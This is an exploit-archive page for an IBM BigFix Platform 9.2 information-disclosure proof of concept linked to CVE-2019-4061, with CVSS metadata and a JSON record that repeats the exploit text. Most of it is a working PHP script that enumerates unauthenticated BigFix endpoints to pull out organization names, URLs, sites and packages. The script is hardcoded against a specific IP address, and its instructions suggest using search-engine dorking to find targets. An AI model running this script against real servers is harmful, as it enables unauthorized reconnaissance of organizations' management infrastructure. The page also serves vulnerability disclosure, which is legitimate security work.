📄 IBM BigFix Platform 9.2 Information Disclosure_PACKETSTORM:212926

5.3 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Description

IBM BigFix Platform version 9.2 information gathering proof of concept exploit...

Visit Original Source

Basic Information

ID PACKETSTORM:212926

Published Dec 17, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : IBM BigFix Platform 9.2 gather information Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://bigfix.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL.

(linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),

[+] save code as poc.php.

[+] Set Target : line 68

[+] USage : php poc.php

[+] PayLoad :

<?php

class IBM_BigFix_Enum
{
private $targetUri;
private $port;
private $ssl;

public function __construct($targetUri, $port = 52311, $ssl = true)
{
$this->targetUri = rtrim($targetUri, '/');
$this->port = $port;
$this->ssl = $ssl;
}

private function sendRequest($uri)
{
$url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function getMasthead()
{
$response = $this->sendRequest('masthead/masthead.axfm');
if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
}
if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
foreach ($matches[1] as $url) {
echo "URL: " . htmlspecialchars($url) . "\n";
}
}
}

public function getSites()
{
$response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
echo "Sites:\n";
foreach ($matches[1] as $site) {
echo "- " . htmlspecialchars($site) . "\n";
}
}
}

public function getPackages()
{
$response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
if (!$response) {
return;
}

echo "Packages:\n";
if (preg_match_all('/url: (.*)/', $response, $matches)) {
foreach ($matches[1] as $url) {
echo "- " . htmlspecialchars($url) . "\n";
}
}
}
}

// تنفيذ الكود
$bigFix = new IBM_BigFix_Enum('153.143.185.78');
$bigFix->getMasthead();
$bigFix->getSites();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-17T16:38:39",
    "description": "IBM BigFix Platform version 9.2 information gathering proof of concept exploit...",
    "published": "2025-12-17T00:00:00",
    "modified": "2025-12-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 IBM BigFix Platform 9.2 Information Disclosure",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212926",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2019-4061"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : IBM BigFix Platform 9.2 gather information Vulnerability                                                                    |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://bigfix.com/                                                                                                         |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL. \n       \n       (linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set Target : line  68 \n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class IBM_BigFix_Enum\n    {\n        private $targetUri;\n        private $port;\n        private $ssl;\n    \n        public function __construct($targetUri, $port = 52311, $ssl = true)\n        {\n            $this->targetUri = rtrim($targetUri, '/');\n            $this->port = $port;\n            $this->ssl = $ssl;\n        }\n    \n        private function sendRequest($uri)\n        {\n            $url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . \":$this->port\" . '/' . ltrim($uri, '/');\n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        public function getMasthead()\n        {\n            $response = $this->sendRequest('masthead/masthead.axfm');\n            if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {\n                echo \"Organization: \" . htmlspecialchars($matches[1]) . \"\\n\";\n            }\n            if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {\n                foreach ($matches[1] as $url) {\n                    echo \"URL: \" . htmlspecialchars($url) . \"\\n\";\n                }\n            }\n        }\n    \n        public function getSites()\n        {\n            $response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');\n            if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {\n                echo \"Sites:\\n\";\n                foreach ($matches[1] as $site) {\n                    echo \"- \" . htmlspecialchars($site) . \"\\n\";\n                }\n            }\n        }\n    \n        public function getPackages()\n        {\n            $response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');\n            if (!$response) {\n                return;\n            }\n    \n            echo \"Packages:\\n\";\n            if (preg_match_all('/url: (.*)/', $response, $matches)) {\n                foreach ($matches[1] as $url) {\n                    echo \"- \" . htmlspecialchars($url) . \"\\n\";\n                }\n            }\n        }\n    }\n    \n    // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f\n    $bigFix = new IBM_BigFix_Enum('153.143.185.78');\n    $bigFix->getMasthead();\n    $bigFix->getSites();\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212926",
    "cvss": {
        "score": 5.3,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
        }
    },
    "href": "https://packetstorm.news/files/id/212926/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply